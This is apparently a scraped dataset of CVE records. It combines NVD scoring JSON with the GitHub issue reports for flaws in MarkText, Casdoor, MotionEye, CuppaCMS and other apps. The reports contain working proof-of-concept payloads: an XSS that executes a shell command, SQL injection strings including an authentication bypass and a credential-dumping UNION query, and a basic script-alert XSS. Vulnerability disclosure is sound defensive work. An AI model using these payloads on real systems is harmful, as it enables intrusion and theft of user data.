{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2946" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/pull/2947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2946" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/pull/2947" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:marktext:marktext:*:*:*:*:*:*:*:*", "matchCriteriaId": "5F071D01-841F-476E-BAF5-A29F31D88D58", "versionEndExcluding": null, "versionEndIncluding": "0.16.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/marktext/marktext/issues/2946
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "marktext", "marktext" ]
<!-- - Please search for issues that matches the one you want to file and use the thumbs up emoji. - Please make sure your application version is up to date. --> ### Description <!-- Description of the bug --> According to https://github.com/marktext/marktext/issues/2504 , it will add a closing element at the end, which means it tries to parse it as HTML. - [x] Can you reproduce the issue? <!-- no: `[ ]` or yes: `[x]` --> ### Steps to reproduce <!-- Steps how the issue occurred. --> Insert the following code into a markdown page: (Remove the `\` in the last line.) ``` ```mermaid sequenceDiagram B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')"> hello -> B: \``` ``` **Expected behavior:** <!-- What you expected to happen --> Language input for the fenced code block should be sanitized before being rendered. **Actual behavior:** <!-- What actually happened --> ![image](https://user-images.githubusercontent.com/12731778/151491763-cbf89a81-3711-4d44-a664-869601505250.png) ### Versions - MarkText version: v0.16.3 - Operating system: macOS 12.1
XSS to RCE vulnerability in Mermaid rendered
https://api.github.com/repos/marktext/marktext/issues/2946/comments
1
2022-01-28T05:24:24Z
2022-01-31T05:51:37Z
https://github.com/marktext/marktext/issues/2946
1,117,015,576
2,946
3,157
CVE-2022-24124
2022-01-29T23:15:07.540
The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/439" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/pull/442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/439" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/pull/442" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB31AE79-CF12-4C1C-9480-4DE0A2A6375D", "versionEndExcluding": "1.13.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/casdoor/casdoor/issues/439
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "casdoor", "casdoor" ]
The query API provides the `field` and `value` parameters to support query by field. It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability. ```go session = session.And(fmt.Sprintf("%s like ?", util.SnakeString(field)), fmt.Sprintf("%%%s%%", value)) ``` And the `/api/get-organizations` is a public route that everyone can visit. Proof of concept: ``` https://door.casbin.com/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name ```
SQL injection vulnerability in field filter
https://api.github.com/repos/casdoor/casdoor/issues/439/comments
7
2022-01-22T09:53:09Z
2022-01-31T05:53:51Z
https://github.com/casdoor/casdoor/issues/439
1,111,401,339
439
3,158
CVE-2021-44255
2022-01-31T12:15:07.767
Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ccrisan/motioneyeos/issues/2843" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ccrisan/motioneyeos/issues/2843" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*", "matchCriteriaId": "ED345730-DFB3-43F6-95C1-D66CF0ADCE67", "versionEndExcluding": "0.42.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:motioneyeos_project:motioneyeos:*:*:*:*:*:*:*:*", "matchCriteriaId": "57C1934D-5DF8-4659-BEEC-625BE7146EFE", "versionEndExcluding": "20200606", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/ccrisan/motioneyeos/issues/2843
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ccrisan", "motioneyeos" ]
As with many web-based apps, the admin user can run arbitrary code on the underlying system via the web-gui. While that may or may not be a security issue, and for meye use cases it probably isn’t, I feel that the lack of password on the admin account has left many publicly available systems open to exploitation. I’d suggest a feature to implement a random password on initial installation. Off hand, I don’t really know how that would look. I may be able to implement something if I find time. Here is a link to my post about the code execution: https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/ Long story short - an admin can run arbitrary code via the option to run commands when motion is detected (obviously). Additionally, an admin can upload a backup that contains a malicious tasks.pickle file that will execute arbitrary code.
Lack of admin password leaves many publicly available systems vulnerable to RCE
https://api.github.com/repos/motioneye-project/motioneyeos/issues/2843/comments
4
2021-11-21T15:35:01Z
2021-12-19T13:38:16Z
https://github.com/motioneye-project/motioneyeos/issues/2843
1,059,410,206
2,843
3,159
CVE-2020-36056
2022-01-31T13:15:07.787
Beetel 777VR1-DI Hardware Version REV.1.01 Firmware Version V01.00.09_55 was discovered to contain a cross-site scripting (XSS) vulnerability via the Ping diagnostic option.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.linkedin.com/in/vivek-panday-796768149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.linkedin.com/in/vivek-panday-796768149" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:beetel:777vr1_firmware:01.00.09_55:*:*:*:*:*:*:*", "matchCriteriaId": "C25270C8-B8A7-47DD-933E-1D5628B411D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:beetel:777vr1:1.01:*:*:*:*:*:*:*", "matchCriteriaId": "9FC6345F-F7F9-499B-B96E-1613B587D9F7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "79" ]
79
https://github.com/VivekPanday12/CVE-/issues/5
[ "Third Party Advisory" ]
github.com
[ "VivekPanday12", "CVE-" ]
# Exploit Title: beetel Moderm 777vr1 — Cross Site Scripting on the beetel 777vr1 via the Ping Diagnostic # Date: 2020–12–25 # Exploit Author: VIVEK PANDAY # Version: Firmware Version V01.00.09_55 777VR1 # Tested on Windows10 # Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/ # CVE-2020-36056 [Cross-site scripting] (XSS) Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. [Step To Reproduce] 1) Login to your router 2) After signing 3) Select for Maintance Mode 4) Go to Ping Diagnostic option 5) In the host Name field, enter any of these payloads: <script> alert ("Hacked") </script>
CVE-2020-36056 beetel Moderm 777vr1 — Cross Site Scripting on the beetel 777vr1 via the Ping Diagnostic
https://api.github.com/repos/VivekPanday12/CVE-/issues/5/comments
0
2022-01-23T15:03:12Z
2022-01-23T15:03:12Z
https://github.com/VivekPanday12/CVE-/issues/5
1,111,895,260
5
3,160
CVE-2020-36064
2022-01-31T13:15:07.830
Online Course Registration v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.sourcecodester.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.sourcecodester.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_course_registration_project:online_course_registration:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "548C546F-53C6-45B2-B9ED-D573B83C1E22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/VivekPanday12/CVE-/issues/2
[ "Third Party Advisory" ]
github.com
[ "VivekPanday12", "CVE-" ]
# Exploit Title: Online Course Registration — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access # Date: 2020–12–25 # Exploit Author: VIVEK PANDAY   # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: 1.0 # Tested on Windows10 # Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149 #  CVE-2020-36064 **Hardcoded Credentials:** Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. **[Attack Vectors]** An attacker can gain admin panel access using default credentials and do malicious activities **Proof Of Concept** 1 Download source code from https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip 2 Now unzip it and go to the Database folder here we can see one SQL file. 3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.
CVE-2020-36064 Online Course Registration — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
https://api.github.com/repos/VivekPanday12/CVE-/issues/2/comments
0
2022-01-23T14:03:54Z
2022-01-23T14:03:54Z
https://github.com/VivekPanday12/CVE-/issues/2
1,111,880,298
2
3,161
CVE-2022-24263
2022-01-31T22:15:07.733
Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA36E354-4DBF-4BE4-9BC4-CB00C6771BAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/kishan0725/Hospital-Management-System/issues/17
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
## VULNERABLE: SQL Injection Authentication Bypass exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/func.php" via the ‘email’ parameters. + Description: The vulnerability is present in the “/Hospital-Management-System-master/func.php " , and can be exploited throuth a POST request via the ‘email’ parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: email =' or 1 limit 0,1# + File affect: + ![code](https://user-images.githubusercontent.com/20487674/151024181-7d46c80f-dbc6-496a-a17f-e5ef2f070703.png) + Proof of concept (POC): + Inject payload: + ![Login](https://user-images.githubusercontent.com/20487674/151024327-3e7fc8a1-3318-4605-b193-20e94db622ab.png) + Bypass authentication success and redirect admin panel + ![done](https://user-images.githubusercontent.com/20487674/151024428-8e164504-dbad-4bb2-b236-326dcec882fd.png)
Bypass authentication with SQL Injection
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/17/comments
1
2022-01-25T17:07:00Z
2023-05-08T15:48:58Z
https://github.com/kishan0725/Hospital-Management-System/issues/17
1,114,148,255
17
3,162
CVE-2022-24264
2022-01-31T22:15:07.777
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/13" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CuppaCMS/CuppaCMS/issues/13
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/table_manager/" via the ‘search_word’ parameters. + Date: 3/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Email: phuctruong2k@gmail.com + Product: CuppaCMS + Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can be exploited throuth a POST request via the ‘search_word’ parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: ```search_word=') union all select concat('version:',version(),'<br>'),concat('database:',database(),'<br>'),group_concat('username:',username,'<br>','password:',password),4,5,6,7,8 from cu_users-- -``` + Proof of concept (POC): ![image](https://user-images.githubusercontent.com/20487674/147924208-41aee7f7-1a88-4f2a-b89d-9b1283226cfa.png) + You can see injection code query into search_word parameters as show below + Request: ![image](https://user-images.githubusercontent.com/20487674/147924254-ae0c0be3-1d9d-472e-8e2b-26d619a1ebda.png) + You see version , database and data as show below + Response: ![image](https://user-images.githubusercontent.com/20487674/147924281-19e7399a-2c05-4c73-bf72-17da284352b6.png) + Request and Response: ![image](https://user-images.githubusercontent.com/20487674/147924312-b36fce91-2af7-43a5-8975-d9db991189ed.png) + Report: [Report.pdf](https://github.com/CuppaCMS/CuppaCMS/files/7801572/Report.pdf)
VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters.
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/13/comments
1
2022-01-03T11:13:24Z
2022-02-03T17:49:23Z
https://github.com/CuppaCMS/CuppaCMS/issues/13
1,092,421,818
13
3,163
CVE-2022-24265
2022-01-31T22:15:07.827
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
